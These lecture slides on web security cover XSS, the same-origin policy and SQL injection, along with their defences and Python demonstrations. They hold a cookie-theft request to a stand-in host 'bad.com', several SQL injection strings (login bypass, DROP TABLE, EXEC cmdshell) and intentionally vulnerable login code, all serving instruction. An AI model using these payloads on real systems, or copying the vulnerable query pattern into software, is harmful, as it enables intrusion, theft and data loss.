Web security II - University Of Maryland

Web security II
With material from Dave Levin, Mike Hicks, Lujo Bauer, Collin Jackson and Michelle Mazurek

Dynamic web pages
Rather than just HTML, web pages can include a program written in Javascript:
  Hello, Javascript
(Javascript: no relation to Java)
- Powerful web page programming language
- Scripts embedded in pages returned by the web server
- Scripts are executed by the browser. They can:
  - Alter page contents (DOM objects)
  - Track events (mouse clicks, motion, keystrokes)
  - Issue web requests & read replies
  - Maintain persistent connections (AJAX)
  - Read and set cookies

What could go wrong?
Browsers need to confine Javascript's power. A script on attacker.com should not be able to:
- Alter the layout of a bank.com page
- Read user keystrokes from a bank.com page
- Read cookies belonging to bank.com

Same Origin Policy
- Browsers provide isolation for Javascript via SOP
- Browser associates web page elements (layout, cookies, events) with their origin: the hostname (bank.com) that provided them
- SOP = only scripts received from a web page's origin have access to the page's elements

Cross-site scripting (XSS)
Two types of XSS
1. Stored (or persistent) XSS attack
- Attacker leaves script on the bank.com server
- Server later unwittingly sends it to your browser

- Browser executes it within same origin as bank.com

Stored XSS attack
[Diagram: client browser, bad.com and bank.com. 1 Inject malicious script into bank.com; 2 Request content; 3 Receive malicious script; 4 Execute the malicious script as though the server meant us to run it; 5 Steal valuable data (GET http://bad.com/steal?c=document.cookie) or perform attacker action (GET http://bank.com/transfer?amt=9999&to=attacker)]

Stored XSS Summary
- Target: user with Javascript-enabled browser who visits user-influenced content on a vulnerable web service
- Attack goal: run script in user's browser with same access as provided to server's regular scripts (i.e., subvert SOP)
- Attacker needs: ability to leave content on the web server (forums, comments, custom profiles)

- Optional: a server for receiving stolen user information
- Key trick: server fails to ensure uploaded content does not contain embedded scripts

Where have we heard this before?
Your friend and mine, Samy
- Samy embedded Javascript in his MySpace page (2005)
- MySpace servers attempted to filter it, but failed
- Users who visited his page ran the program, which:
  - Made them friends with Samy
  - Displayed "but most of all, Samy is my hero" on their profile
  - Installed the script in their profile to propagate
- From 73 to 1,000,000 friends in 20 hours
- Took down MySpace for a weekend
- Felony computer hacking; banned from computers for 3 years

Two types of XSS
1. Stored (or persistent) XSS attack
- Attacker leaves their script on the bank.com server
- The server later unwittingly sends it to your browser
- Your browser, none the wiser, executes it within the same origin as the bank.com server
2. Reflected XSS attack
- Attacker gets you to send bank.com a URL that includes Javascript
- bank.com echoes the script back to you in its response

- Your browser executes the script in the response within the same origin as bank.com

Reflected XSS attack
[Diagram: client browser, bad.com and bank.com. 1 Visit a malicious web page; 2 Receive a bad.com URL specially crafted by the attacker; 3 Click on link; 4 Echo user input; 5 Execute the malicious script as though the server meant us to run it; 6 Steal valuable data or perform attacker action]

Echoed input
The key to the reflected XSS attack is to find instances where a good web server will echo the user input back in the HTML response.
Input from bad.com: http://victim.com/search.php?term=socks
Result from victim.com:
  Search results

  Results for socks: . . .

Exploiting echoed input
Input from bad.com: http://victim.com/search.php?term=
Result from victim.com:
  Search results
  Results for . . .
Browser would execute this within victim.com's origin

Reflected XSS Summary
- Target: user with Javascript-enabled browser; vulnerable web service that includes parts of URLs it receives in the output it generates
- Attack goal: run script in user's browser with same access as provided to server's regular scripts (subvert SOP)
- Attacker needs: get user to click on specially-crafted URL. Optional: a server for receiving stolen user information
- Key trick: server does not ensure its output does not contain foreign, embedded scripts

XSS Defense: Filter/Escape
- Typical defense is sanitizing: remove executable portions of user-provided content, or ...
- Libraries exist for this purpose
Better defense: White list
- Instead of trying to sanitize, validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous spec of what should be allowed.
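As an added example (not code from the lecture), the search.php echo from the slides rendered in Python two ways, with the whitelist check from the "Better defense" slide in front of it; the page template and all function names are assumptions of this example.

```python
import html
import re

# Constructed stand-in for victim.com's search results page (not the lecture's code).
PAGE = "<html><body><h1>Search results</h1><p>Results for {term}:</p></body></html>"


def render_search_vulnerable(term: str) -> str:
    """Echo the query parameter into the HTML untouched: the reflected XSS sink."""
    return PAGE.format(term=term)


def render_search_escaped(term: str) -> str:
    """Escape < > & " ' so the browser treats the term as text, never as markup."""
    return PAGE.format(term=html.escape(term, quote=True))


# Whitelist: a rigorous spec of what a search term may contain (letters, digits,
# spaces, hyphens; 1 to 64 characters). Anything else is rejected, not fixed.
_TERM_RE = re.compile(r"[A-Za-z0-9 \-]{1,64}")


def is_valid_search_term(term: str) -> bool:
    """Check the input is known to be safe instead of hunting for bad characters."""
    return _TERM_RE.fullmatch(term) is not None


def search_handler(term: str) -> str:
    """Fail-safe default: reject on whitelist failure, and still escape what passes."""
    if not is_valid_search_term(term):
        return "<html><body><h1>Search results</h1><p>Invalid search term.</p></body></html>"
    return render_search_escaped(term)


if __name__ == "__main__":
    probe = "<script>/* constructed probe */</script>"  # harmless test input
    print(render_search_vulnerable(probe))  # the tag lands in the page as markup
    print(render_search_escaped(probe))     # &lt;script&gt;... is shown as text
    print(search_handler(probe))            # rejected by the whitelist
    print(search_handler("socks"))
```

The whitelist also rejects a legitimate term such as "Nyong'o", which is the "hard for rich input" downside the later slides describe.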

XSS vs. CSRF
Do not confuse the two:
- XSS exploits the trust a client browser has in data sent from the legitimate website. So the attacker tries to control what the website sends to the client browser.
- CSRF exploits the trust a legitimate website has in data sent from the client browser. So the attacker tries to control what the client browser sends to the website.

SQL injection
http://xkcd.com/327/

Server-side data
[Diagram: client browser <-> web server <-> (private) database]
- Long-lived state, stored in a separate database
- Need to protect this state from illicit access and tampering

SQL (Standard Query Language)
Table name: Users (each line is a row/record, each field a column; e-mail addresses were obfuscated by extraction)
  Name     Gender  Age    Email              Password
  Connie   F       12     [email protected]  j3i8g8ha
  Steven   M       14     [email protected]  a0u23bt
  Greg     M       34     [email protected]  0aergja
  Vidalia  M       35     [email protected]  1bjb9a93
  Pearl    F       10000  [email protected]  ziog9gga

  SELECT Age FROM Users WHERE Name='Greg';        -- returns 34
  UPDATE Users SET Email='[email protected]' WHERE Age=34;   -- this is a comment
  INSERT INTO Users VALUES('Pearl', 'F', ...);
  DROP TABLE Users;

Server-side code
Website login code (PHP):
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
Suppose you successfully log in as $user if this returns any results. How could you exploit this?

SQL injection
Input: frank' OR 1=1); --
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
becomes
  $result = mysql_query("select * from Users where(name='frank' OR 1=1); --' and password='whocares');");
Login successful! Problem: data and code mixed up together.

SQL injection: Worse
Input: frank' OR 1=1); DROP TABLE Users; --
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
becomes
  $result = mysql_query("select * from Users where(name='frank' OR 1=1); DROP TABLE Users; --' and password='whocares');");
Can chain together statements with semicolon: STATEMENT 1 ; STATEMENT 2

SQL injection: Even worse
Input: '); EXEC cmdshell ; --
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
becomes
  $result = mysql_query("select * from Users where(name=''); EXEC cmdshell ; --' and password='whocares');");
http://xkcd.com/327/

SQL injection attacks are common
[Chart: percentage of vulnerabilities that are SQL injection, by year, y-axis 0 to 25%; source: http://web.nvd.nist.gov/view/vuln/statistics]

SQL injection countermeasures
The underlying issue
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
- This one string combines the code and the data
- Similar to buffer overflows: when the boundary between code and data blurs, we open ourselves up to vulnerabilities
[Parse tree of the query: select -> (*, from Users, where -> and -> (name = $user, password = $pass)). $user and $pass should be data, not code.]

Prevention: Input validation
- We require input of a certain form, but we cannot guarantee it has that form, so we must validate it
- Just like we do to avoid buffer overflows
Making input trustworthy
- Check it has the expected form, reject it if not
- Sanitize by modifying it or using it such that the result is correctly formed

Sanitization: Blacklisting
- Delete the characters you don't want: ' ; --
- Downside: Lupita Nyong'o. You want these characters sometimes! How do you know if/when the characters are bad?
- Downside: how to know you've ID'd all bad chars?

Sanitization: Escaping
- Replace problematic characters with safe ones
  - Change ' to \'
  - Change ; to \;
  - Change - to \-
  - Change \ to \\
- Hard by hand; there are many libs & methods: magic_quotes_gpc = On, mysql_real_escape_string()
- Downside: sometimes you want these in your SQL! And escaping still may not be enough

Checking: Whitelisting
- Check that the user input is known to be safe, e.g., integer within the right range
- Rationale: given invalid input, safer to reject than fix
  - Fixes may result in wrong output, or vulnerabilities
  - Principle of fail-safe defaults
- Downside: hard for rich input! How to whitelist usernames? First names?
Sanitization via escaping, whitelisting, blacklisting is HARD. Can we do better?

Sanitization: Prepared statements
- Treat user data according to its type
- Decouple the code and the data
Before:
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
After (PHP's mysqli class; the slide's "new mysql" is not a PHP class):
  $db = new mysqli("localhost", "user", "pass", "DB");
  $statement = $db->prepare("select * from Users where(name=? and password=?);");
  $statement->bind_param("ss", $user, $pass);   // bind variables
  $statement->execute();
Bind variables are typed.

Using prepared statements
Instead of
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
write
  $statement = $db->prepare("select * from Users where(name=? and password=?);");
  $statement->bind_param("ss", $user, $pass);
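As an added example (not from the lecture), the slides' login query run three ways against an in-memory SQLite copy of the Users table: the string-built version, the blacklisting version, and the prepared (parameterised) version, each fed the "frank' OR 1=1); --" input and the legitimate name "Lupita Nyong'o" from the blacklisting slide. The table contents and all function names are constructed for this example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the slides' Users table (sample values)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users(Name TEXT, Gender TEXT, Age INTEGER, "
               "Email TEXT, Password TEXT)")
    db.executemany("INSERT INTO Users VALUES(?,?,?,?,?)", [
        ("Connie", "F", 12, "connie@example.com", "j3i8g8ha"),
        ("Greg", "M", 34, "greg@example.com", "0aergja"),
        ("Lupita Nyong'o", "F", 40, "lupita@example.com", "s3cret"),
    ])
    return db


def login_vulnerable(db, user, pw):
    """The slides' PHP login transliterated: code and data in one string."""
    sql = f"select * from Users where(name='{user}' and password='{pw}');"
    return db.execute(sql).fetchall()


def login_blacklist(db, user, pw):
    """Blacklisting from the slides: delete ' ; - before building the string."""
    def strip(s):
        return s.translate({ord(c): None for c in "';-"})
    return login_vulnerable(db, strip(user), strip(pw))


def login_prepared(db, user, pw):
    """Prepared statement: the query tree is fixed first, inputs bind to leaves."""
    sql = "select * from Users where(name=? and password=?);"
    return db.execute(sql, (user, pw)).fetchall()


def outcome(fn, db, user, pw):
    """Rows returned by a login attempt, or -1 if the database rejected the SQL."""
    try:
        return len(fn(db, user, pw))
    except sqlite3.Error:
        return -1


if __name__ == "__main__":
    db = make_db()
    for name, fn in [("vulnerable", login_vulnerable),
                     ("blacklist", login_blacklist),
                     ("prepared", login_prepared)]:
        print(name, "| injection:", outcome(fn, db, "frank' OR 1=1); --", "whocares"),
              "| Nyong'o:", outcome(fn, db, "Lupita Nyong'o", "s3cret"))
```

Only the prepared version both refuses the injected input and lets Lupita Nyong'o log in; the string-built version returns every row for the injection and errors on the apostrophe, and blacklisting silently breaks the real name. Python's sqlite3 execute() also refuses a second statement after a semicolon, so the DROP TABLE chain from the slides fails here for a library reason, not because the input was validated.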

[Parse tree of the prepared query: select -> (*, from Users, where -> and -> (name = ?, password = ?)). The input "frank' OR 1=1); --" is bound to the name leaf as data.]
Binding is only applied to the leaves, so the structure of the tree is fixed.

Additional mitigation
- For defense in depth, also try to mitigate any attack. But should always do input validation in any case!
- Limit privileges; reduces power of exploitation
  - Limit commands and/or tables a user can access, e.g., allow SELECT on Orders but not Creditcards
- Encrypt sensitive data; less useful if stolen
  - May not need to encrypt Orders table, but certainly encrypt creditcards.cc_numbers

Input validation, ad infinitum
Many other web-based bugs, ultimately due to trusting external input (too much)
http://www.jantoo.com/cartoon/08336711

Takeaways: Verify before trust
- Improperly validated input causes many attacks
- Common to solutions: check or sanitize all data
  - Whitelisting: more secure than blacklisting
  - Checking: more secure than sanitization
- Proper sanitization is hard
- All data: are you sure you found all inputs?
- Don't roll your own: libraries, frameworks, etc.
